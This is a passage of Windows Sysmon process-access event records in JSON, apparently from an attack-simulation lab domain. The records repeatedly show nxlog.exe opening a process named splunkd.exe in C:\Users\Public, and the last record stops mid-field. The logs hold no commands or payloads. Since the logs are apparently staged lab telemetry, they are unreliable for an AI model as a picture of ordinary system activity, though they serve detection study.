{"EventTime":"2020-08-01 06:53:36","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4455,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:36.499\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:36.499","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:53:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:37","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4456,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:37.499\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:37.499","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:53:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:38","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4457,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:38.499\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:38.499","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:53:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4458,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:39.500\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:39.500","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:53:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4459,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:40.500\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:40.500","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:53:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:41","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4460,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:41.500\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:41.500","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:53:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:42","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4461,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:42.500\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files 